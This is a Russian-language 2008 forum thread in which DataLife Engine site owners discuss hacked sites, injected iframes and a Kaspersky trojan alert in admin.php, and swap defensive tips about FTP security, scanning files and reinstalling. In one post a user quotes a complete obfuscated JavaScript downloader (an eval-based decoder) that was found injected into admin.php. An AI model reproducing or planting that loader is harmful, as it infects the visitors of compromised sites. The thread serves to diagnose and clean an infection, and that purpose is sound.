Maximus2008 0 Опубликовано: 28 мая 2008 Рассказать Опубликовано: 28 мая 2008 (изменено) Сайт на движке DataLife Engine . Проблема в том что хакеры часто ломятся на сайт и прошивают левые скрипты , после этого сайт начинает тупить , приходиться искать и удалять вручную . Посоветуйте , что мне делать ???? С уважением , Ссылка на сайт : http://www.vip-zona.com/ Изменено 28 мая 2008 пользователем STRANNICK2008 Цитата Ссылка на сообщение Поделиться на других сайтах
lifestar 18 Опубликовано: 28 мая 2008 Рассказать Опубликовано: 28 мая 2008 Проблема в том что хакеры часто ломятся на сайт и прошивают левые скриптыскорее не на сайт, а на ваш компьютер или хостера. 1. Защитить свой компьютер 2. Выбирать надёжного хостера Цитата Ссылка на сообщение Поделиться на других сайтах
Danila 8 Опубликовано: 28 мая 2008 Рассказать Опубликовано: 28 мая 2008 (изменено) За последние 2 года ни разу не слышал чтобы это было из-за хостера (*NIX хостера). А по поводу проблемы, погуглите насчет .ftpaccess Изменено 28 мая 2008 пользователем Danila Цитата Ссылка на сообщение Поделиться на других сайтах
lifestar 18 Опубликовано: 28 мая 2008 Рассказать Опубликовано: 28 мая 2008 За последние 2 года ни разу не слышал чтобы это было из-за хостера (*NIX хостера).pr службы не зря зарплату получает Цитата Ссылка на сообщение Поделиться на других сайтах
Danila 8 Опубликовано: 28 мая 2008 Рассказать Опубликовано: 28 мая 2008 я это знаю с другой стороны Цитата Ссылка на сообщение Поделиться на других сайтах
Maximus2008 0 Опубликовано: 29 мая 2008 Рассказать Опубликовано: 29 мая 2008 Автор Спасибки !!! за помощь , избавился то проблемы , сейчас все работает как часики без тупников ВСЕ BEST !!!! Цитата Ссылка на сообщение Поделиться на других сайтах
Maximus2008 0 Опубликовано: 3 июня 2008 Рассказать Опубликовано: 3 июня 2008 Автор pr службы не зря зарплату получает это верно пусть свои бабки отрабатывают! Цитата Ссылка на сообщение Поделиться на других сайтах
Icomm 0 Опубликовано: 6 июня 2008 Рассказать Опубликовано: 6 июня 2008 STRANNICK2008, а какие конкретно меры предприняли? Цитата Ссылка на сообщение Поделиться на других сайтах
xsash 9 Опубликовано: 6 июня 2008 Рассказать Опубликовано: 6 июня 2008 //offtop хм, сейчас обнаружил что Age-Web.Org ломанули, хз как, хостер, ftp... туда ходить НЕ советую без антивиря и из под IE, около 5 фраймов насчитал по пискам антириря Цитата Ссылка на сообщение Поделиться на других сайтах
dojino 0 Опубликовано: 13 июня 2008 Рассказать Опубликовано: 13 июня 2008 За последние 2 года ни разу не слышал чтобы это было из-за хостера ага, - у меня год назад один сотрудник хостера, где у меня был сайт: сначала потихому менял код рекламных блоков Гугла, а потом вообще выкачал весь сайт и сделал зеркало... я его вычислил и поймал за жопу! Хостер конечно извинился, говоря что в их практике такое впервые, но мне пришлось от них уйти. ... а прикиньте какое "гавно" им было еслиб я начал постить отзывы везде где мона? Радует одно - этот "сотрудник" потерялся так, что его никто не может найти. Цитата Ссылка на сообщение Поделиться на других сайтах
pilisos 0 Опубликовано: 15 июня 2008 Рассказать Опубликовано: 15 июня 2008 Народ помогите избавиться от вируса в админ панели сайта,что делать не знаю,очень прошу помощи,вот что пишет касперский при входе в админ панель сайта обнаружено: троянская программа Trojan-Downloader.JS.Agent.iz Скрипт: admin.php[1] обнаружено: троянская программа Trojan-Downloader.JS.Psyme.mf Скрипт: admin.php[2] Зарание благодарен с уважением Виктор. Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 082 Опубликовано: 15 июня 2008 Рассказать Опубликовано: 15 июня 2008 pilisos, правило форума читайте и выполняйте если вам нужна помощь на этом форуме. Цитата Ссылка на сообщение Поделиться на других сайтах
baxus 49 Опубликовано: 15 июня 2008 Рассказать Опубликовано: 15 июня 2008 нужно просто фтп пароль сделать нормальным а не домашний телефон и вирусы ломится небудут... А ещё во времена когда я сидел на нулях (по незнанке ) тоже каждый день индекс пхп чистил от фреймов с троянами Цитата Ссылка на сообщение Поделиться на других сайтах
Danila 8 Опубликовано: 16 июня 2008 Рассказать Опубликовано: 16 июня 2008 (изменено) нужно просто фтп пароль сделать нормальным а не домашний телефон и вирусы ломится небудут... А ещё во времена когда я сидел на нулях (по незнанке ) тоже каждый день индекс пхп чистил от фреймов с троянами Не поможет, по протоколу FTP пароль передается в незашифрованном виде. Если у вас сидит троян хоть такой Hyd683mxd00 пароль ставте, его просто утянут и всё. Это поможет если пользуетесь SFTP клиентом или SSH + антивирус мониторит на трояны. Проще .ftpaccess настроить. Изменено 16 июня 2008 пользователем Danila Цитата Ссылка на сообщение Поделиться на других сайтах
pilisos 0 Опубликовано: 16 июня 2008 Рассказать Опубликовано: 16 июня 2008 Народ помогите избавиться от вируса в админ панели сайта,что делать не знаю,очень прошу помощи,вот что пишет касперский при входе в админ панель сайта обнаружено: троянская программа Trojan-Downloader.JS.Agent.iz Скрипт: admin.php[1] обнаружено: троянская программа Trojan-Downloader.JS.Psyme.mf Скрипт: admin.php[2] Зарание благодарен с уважением Виктор. Адрес сайта:www.pilisos.net Цитата Ссылка на сообщение Поделиться на других сайтах
empirator 0 Опубликовано: 16 июня 2008 Рассказать Опубликовано: 16 июня 2008 (изменено) оффтоп: pilisos, за распространение нуленых версий ДЛЕ по головке не гладят... Никогда не понимал таких людей. На сайте лежит нулленый скрипт, а хозяин лезет в официальную техподержку! Изменено 16 июня 2008 пользователем empirator Цитата Ссылка на сообщение Поделиться на других сайтах
pilisos 0 Опубликовано: 16 июня 2008 Рассказать Опубликовано: 16 июня 2008 Извени конечно,но их нуленных лежит на сотнях сайтов,на модин меньше на один больше нечего не изменит,запусти гугл и увидеш сколько нуленных лежит на сайтах. А если можеш лучше помоги избавиться от вируса на сайте. Если что не так извени. Цитата Ссылка на сообщение Поделиться на других сайтах
empirator 0 Опубликовано: 17 июня 2008 Рассказать Опубликовано: 17 июня 2008 pilisos, обрати внимание на лицензионное соглашение: Покупатель не имеет право: Передавать права на использование программного продукта третьим лицам. Изменять структуру программных кодов, функции программы, с целью создания родственных продуктов Создавать отдельные самостоятельные продукты, базирующиеся на нашем программном коде Использовать более одной копии програмного продукта DataLife Engine по одной лицензии Рекламировать, продавать или публиковать на своем сайте пиратские копии нашего программного продукта Распространять или содействовать распространению нелицензионных копий програмного продукта DataLife Engine Досрочное расторжение договорных обязательств Данное соглашение расторгается автоматически, если Вы отказываетесь выполнять условия нашего договора. Данное лицензионное соглашение может быть расторгнуто нами в одностороннем порядке, в случае установления фактов нарушения данного лицензионного соглашения. В случае досрочного расторжения договора Вы обязуетесь удалить все Ваши копии нашего программного продукта в течение 3 рабочих дней, с момента получения соответствующего уведомления. Цитата Ссылка на сообщение Поделиться на других сайтах
pilisos 0 Опубликовано: 17 июня 2008 Рассказать Опубликовано: 17 июня 2008 Еще раз извеняюсь и обязуюсь сегодня удалить с сайта нуленную версию движка.А насчот вируса хто нибудь хоть слово напишет? Цитата Ссылка на сообщение Поделиться на других сайтах
empirator 0 Опубликовано: 17 июня 2008 Рассказать Опубликовано: 17 июня 2008 Лично мне подозрителен этот код: <script language=JavaScript>function aklban(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,7,27,12,42,9,26,50,11,23,0,0,0,0,0,0,58,47,39,45,36,43,21,24,60,37,62,51, 31,55,56,5,4,59,29,0,15,57,52,53,30,6,19,0,0,0,0,8,0,16,22,1,46,2,44,35,34,48,33, 40,49,10,61,17,25,18,28,3,41,38,13,20,14,32,54);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){{w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(202^w&255);w>>=8;s-=2}else{s=6}}}eval(r);}}aklban('nxmtdb6ADBEAE@QAUXLQxbmtAzXHdb640X@ED@8UnhQkJJ4NC20kfhQ4BJ4@Dd@tAXT0U0@0@EXd Nu@nk84AJ48HI9XJ@x6EUqJkD76tIQ2UWMXN1d4AhqxdIJ8tdmJjE@EkDgQ4D@6tBmJNyMTJK80NjMx0U 0@0@MXNCgd@nx4EJm@nQMAH48@Egz4kJXA0QEXdJxEtAXT@dx6d@6@4KeTtIq@EkZAnITmENd@tAqLQgs')</script> Зачем он там? Цитата Ссылка на сообщение Поделиться на других сайтах
pilisos 0 Опубликовано: 17 июня 2008 Рассказать Опубликовано: 17 июня 2008 Не знаю вчера чот подобное удалял в шаблоне сайта,а в каком файле ты его нашол? Цитата Ссылка на сообщение Поделиться на других сайтах
empirator 0 Опубликовано: 17 июня 2008 Рассказать Опубликовано: 17 июня 2008 Не знаю вчера чот подобное удалял в шаблоне сайта,а в каком файле ты его нашол? admin.php Цитата Ссылка на сообщение Поделиться на других сайтах
pilisos 0 Опубликовано: 17 июня 2008 Рассказать Опубликовано: 17 июня 2008 Большое спасибо,вечером попробую.я сейчас на работе.Кстати вирус, касперский находит какраз при входе в админ панель и еще меня постоянно выбрасывает из админ панели в поисковик яндекс, тоже из за вируса наверно? Цитата Ссылка на сообщение Поделиться на других сайтах
Danila 8 Опубликовано: 17 июня 2008 Рассказать Опубликовано: 17 июня 2008 сделай контекстный поиск по всем файлам движка (включая шаблоны), ищи либо iframe либо script, подозрительные файлы сравнивай с дистрибутивом, и удаляй все лишнее. А еще проще дистрибутив перезалить поверх существующего. Цитата Ссылка на сообщение Поделиться на других сайтах
pilisos 0 Опубликовано: 17 июня 2008 Рассказать Опубликовано: 17 июня 2008 iframe искал ненашол,дополнительных файлов тоже нет,а как перезалить дистрибутив? Цитата Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Присоединяйтесь к обсуждению
Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.